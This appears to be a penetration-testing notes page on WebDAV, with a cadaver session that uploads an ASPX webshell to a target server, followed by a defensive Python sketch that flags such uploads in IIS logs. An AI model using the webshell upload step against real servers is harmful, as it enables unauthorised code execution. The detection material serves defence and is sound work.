WebDAV

WebDAV extends the functionality of the HTTP protocol to allow remote file management over the web. It introduces additional HTTP methods that enable tasks such as file uploads, downloads, edits, and deletions directly on a web server, effectively turning the server into a remote file system. Within penetration testing, WebDAV is of particular interest because misconfigurations often expose writable directories that attackers can exploit to upload and execute malicious files, thereby escalating access.

Cadaver is a command-line WebDAV client designed to interact with WebDAV-enabled servers. It provides a simple interface for performing operations such as browsing directories, transferring files, and modifying resources remotely.

$ cadaver http://target
Authentication required for target on server `x7331':
Username: x7331
Password:
# Upload a webshell on the target server
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx
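
From the defender's side, an upload like the one above leaves a recognisable trace in the web server's access log: a successful PUT of a server-executable file, often followed by a request for the same path. The following detection sketch is an added example, not part of the original page; it assumes IIS W3C logging with the fields shown, the extension list is an assumption to tune per server, and the sample log lines are constructed.

```python
# Added example: flag WebDAV uploads of server-executable files in an IIS W3C log.
from pathlib import PurePosixPath

SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx", ".php", ".jsp"}  # assumed list
WRITE_OK = {"201", "204"}   # 201 Created (new file), 204 No Content (overwrite)

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2024-05-01 10:00:01 PROPFIND / x7331 10.0.0.5 207
2024-05-01 10:00:09 PUT /cmdasp.aspx x7331 10.0.0.5 201
2024-05-01 10:00:15 PUT /notes.txt x7331 10.0.0.5 201
2024-05-01 10:00:20 PUT /locked.aspx - 10.0.0.9 401
2024-05-01 10:00:31 GET /cmdasp.aspx - 10.0.0.5 200
2024-05-01 10:00:40 GET /index.html - 10.0.0.7 200
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):      # skip truncated or corrupt rows
                yield dict(zip(fields, values))

def find_webdav_script_uploads(text):
    """Return findings for successful PUTs of script files, noting later requests."""
    uploads = {}                                # lower-cased path -> finding
    for req in parse_w3c(text):
        path = req["cs-uri-stem"].lower()       # IIS paths are case-insensitive
        method, status = req["cs-method"].upper(), req["sc-status"]
        ext = PurePosixPath(path).suffix
        if method == "PUT" and status in WRITE_OK and ext in SCRIPT_EXTS:
            uploads[path] = {"path": path, "user": req["cs-username"],
                             "client": req["c-ip"], "requested_after_upload": False}
        elif method in {"GET", "POST"} and status == "200" and path in uploads:
            uploads[path]["requested_after_upload"] = True
    return list(uploads.values())

if __name__ == "__main__":
    for finding in find_webdav_script_uploads(SAMPLE_LOG):
        print(finding)
```

A finding with `requested_after_upload` set to true is the higher-priority case, since the uploaded script was subsequently served with a 200 response. The durable fix is to remove write access or script execution from WebDAV-published directories.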
